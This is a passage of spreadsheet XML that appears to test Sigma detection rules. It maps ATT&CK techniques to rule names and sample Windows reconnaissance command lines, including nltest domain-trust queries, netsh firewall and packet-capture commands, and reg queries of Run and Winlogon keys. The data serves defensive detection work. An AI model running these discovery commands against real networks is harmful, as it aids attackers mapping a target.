          <t>Share And Session Enumeration Using Net.EXE (62510e69-616b-4078-b371-847da438cc03)</t>
        </is>
      </c>
      <c r="J1669" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1669" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1670" ht="15.75" customHeight="1" s="42">
      <c r="A1670" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1670" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C1670" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1670" s="43" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E1670" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall show rule name^=all</t>
        </is>
      </c>
      <c r="F1670" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1670" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1670" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE (0e4164da-94bc-450d-a7be-a4b176179f1f)</t>
        </is>
      </c>
      <c r="J1670" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1670" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1671" ht="15.75" customHeight="1" s="42">
      <c r="A1671" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1671" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_rules_discovery</t>
        </is>
      </c>
      <c r="C1671" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1671" s="43" t="inlineStr">
        <is>
          <t>0e4164da-94bc-450d-a7be-a4b176179f1f</t>
        </is>
      </c>
      <c r="E1671" s="43" t="inlineStr">
        <is>
          <t>netsh advfirewall firewall show rule name=all</t>
        </is>
      </c>
      <c r="F1671" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1671" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1671" s="43" t="inlineStr">
        <is>
          <t>Firewall Configuration Discovery Via Netsh.EXE (0e4164da-94bc-450d-a7be-a4b176179f1f)</t>
        </is>
      </c>
      <c r="J1671" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1671" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1672" ht="15.75" customHeight="1" s="42">
      <c r="A1672" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1672" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1672" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1672" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1672" s="43" t="inlineStr">
        <is>
          <t>nltest /domain_trusts</t>
        </is>
      </c>
      <c r="F1672" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1672" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1672" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1672" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1672" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1673" ht="15.75" customHeight="1" s="42">
      <c r="A1673" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1673" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1673" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1673" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1673" s="43" t="inlineStr">
        <is>
          <t>nltest /dclist:contoso.local</t>
        </is>
      </c>
      <c r="F1673" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1673" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1673" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1673" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1673" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1674" ht="15.75" customHeight="1" s="42">
      <c r="A1674" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1674" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1674" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1674" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1674" s="43" t="inlineStr">
        <is>
          <t>nltest /trusted_domains</t>
        </is>
      </c>
      <c r="F1674" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1674" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1674" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1674" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1674" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1675" ht="15.75" customHeight="1" s="42">
      <c r="A1675" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1675" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1675" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1675" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1675" s="43" t="inlineStr">
        <is>
          <t>nltest /dnsgetdc:contoso.local</t>
        </is>
      </c>
      <c r="F1675" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1675" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1675" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1675" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1675" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1676" ht="15.75" customHeight="1" s="42">
      <c r="A1676" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1676" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1676" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1676" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1676" s="43" t="inlineStr">
        <is>
          <t>nltest /parentdomain</t>
        </is>
      </c>
      <c r="F1676" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1676" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1676" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1676" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1676" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1677" ht="15.75" customHeight="1" s="42">
      <c r="A1677" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1677" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1677" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1677" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1677" s="43" t="inlineStr">
        <is>
          <t>nltest /server:DC01 /trusted_domains</t>
        </is>
      </c>
      <c r="F1677" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1677" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1677" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1677" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1677" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1678" ht="15.75" customHeight="1" s="42">
      <c r="A1678" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1678" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1678" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1678" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1678" s="43" t="inlineStr">
        <is>
          <t>nltest /user:Administrator /domain_trusts</t>
        </is>
      </c>
      <c r="F1678" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1678" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1678" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1678" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1679" ht="15.75" customHeight="1" s="42">
      <c r="A1679" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1679" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1679" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1679" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1679" s="43" t="inlineStr">
        <is>
          <t>nltest /dsgetdc:contoso.local</t>
        </is>
      </c>
      <c r="F1679" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1679" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1679" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1679" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1680" ht="15.75" customHeight="1" s="42">
      <c r="A1680" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1680" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1680" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1680" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1680" s="43" t="inlineStr">
        <is>
          <t>nltest /domain:contoso.local /trusted_domains</t>
        </is>
      </c>
      <c r="F1680" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1680" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1680" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1680" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1681" ht="15.75" customHeight="1" s="42">
      <c r="A1681" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1681" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nltest_recon</t>
        </is>
      </c>
      <c r="C1681" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE</t>
        </is>
      </c>
      <c r="D1681" s="43" t="inlineStr">
        <is>
          <t>5cc90652-4cbd-4241-aa3b-4b462fa5a248</t>
        </is>
      </c>
      <c r="E1681" s="43" t="inlineStr">
        <is>
          <t>nltest /query /domain_trusts</t>
        </is>
      </c>
      <c r="F1681" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1681" s="43" t="inlineStr">
        <is>
          <t>Potential Recon Activity Via Nltest.EXE (5cc90652-4cbd-4241-aa3b-4b462fa5a248)</t>
        </is>
      </c>
      <c r="J1681" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1681" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1682" ht="15.75" customHeight="1" s="42">
      <c r="A1682" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1682" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1682" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1682" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1682" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c ipconfig /all ^&amp; net config workstation ^&amp; net view /all /domain ^&amp; nltest /domain_trusts</t>
        </is>
      </c>
      <c r="F1682" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1682" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command (a29c1813-ab1f-4dde-b489-330b952e91ae); Suspicious Network Command (a29c1813-ab1f-4dde-b489-330b952e91ae)</t>
        </is>
      </c>
      <c r="J1682" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1682" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1683" ht="15.75" customHeight="1" s="42">
      <c r="A1683" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1683" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1683" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1683" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1683" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c ipconfig /all ^&amp; netsh interface show interface ^&amp; arp -a ^&amp; nbtstat -n ^&amp; net config</t>
        </is>
      </c>
      <c r="F1683" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1683" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command (a29c1813-ab1f-4dde-b489-330b952e91ae); Suspicious Network Command (a29c1813-ab1f-4dde-b489-330b952e91ae)</t>
        </is>
      </c>
      <c r="J1683" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1683" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1684" ht="15.75" customHeight="1" s="42">
      <c r="A1684" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1684" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1684" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1684" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1684" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c arp -a</t>
        </is>
      </c>
      <c r="F1684" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1684" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command (a29c1813-ab1f-4dde-b489-330b952e91ae)</t>
        </is>
      </c>
      <c r="J1684" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1684" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1685" ht="15.75" customHeight="1" s="42">
      <c r="A1685" s="43" t="inlineStr">
        <is>
          <t>t1040</t>
        </is>
      </c>
      <c r="B1685" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_packet_capture</t>
        </is>
      </c>
      <c r="C1685" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D1685" s="43" t="inlineStr">
        <is>
          <t>d3c3861d-c504-4c77-ba55-224ba82d0118</t>
        </is>
      </c>
      <c r="E1685" s="43" t="inlineStr">
        <is>
          <t>netsh   trace    start   capture=yes tracefile=C:\Users\thaim\AppData\Local\Temp\trace.etl maxsize=10</t>
        </is>
      </c>
      <c r="F1685" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1685" s="43" t="inlineStr">
        <is>
          <t>New Network Trace Capture Started Via Netsh.EXE (d3c3861d-c504-4c77-ba55-224ba82d0118)</t>
        </is>
      </c>
      <c r="J1685" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1685" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1686" ht="15.75" customHeight="1" s="42">
      <c r="A1686" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1686" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1686" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1686" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1686" s="43" t="inlineStr">
        <is>
          <t>reg  query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"</t>
        </is>
      </c>
      <c r="F1686" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1686" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1686" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1686" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1687" ht="15.75" customHeight="1" s="42">
      <c r="A1687" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1687" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1687" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1687" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1687" s="43" t="inlineStr">
        <is>
          <t>reg  query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"</t>
        </is>
      </c>
      <c r="F1687" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1687" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1687" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1687" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1688" ht="15.75" customHeight="1" s="42">
      <c r="A1688" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1688" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1688" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1688" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1688" s="43" t="inlineStr">
        <is>
          <t>reg  query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"</t>
        </is>
      </c>
      <c r="F1688" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1688" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1688" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1688" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1689" ht="15.75" customHeight="1" s="42">
      <c r="A1689" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1689" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1689" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1689" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1689" s="43" t="inlineStr">
        <is>
          <t>reg  query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"</t>
        </is>
      </c>
      <c r="F1689" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1689" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1689" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1689" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1690" ht="15.75" customHeight="1" s="42">
      <c r="A1690" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1690" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1690" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1690" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1690" s="43" t="inlineStr">
        <is>
          <t>reg  query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"</t>
        </is>
      </c>
      <c r="F1690" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1690" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1690" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1690" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1691" ht="15.75" customHeight="1" s="42">
      <c r="A1691" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1691" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1691" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1691" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1691" s="43" t="inlineStr">
        <is>
          <t>reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</t>
        </is>
      </c>
      <c r="F1691" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1691" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1691" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1691" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1692" ht="15.75" customHeight="1" s="42">
      <c r="A1692" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1692" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1692" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1692" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1692" s="43" t="inlineStr">
        <is>
          <t>reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Run</t>
        </is>
      </c>
      <c r="F1692" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1692" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1692" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1692" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1693" ht="15.75" customHeight="1" s="42">
      <c r="A1693" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1693" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1693" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1693" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1693" s="43" t="inlineStr">
        <is>
          <t>reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce</t>
        </is>
      </c>
      <c r="F1693" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1693" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1693" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K1693" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1694" ht="15.75" customHeight="1" s="42">
      <c r="A1694" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1694" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
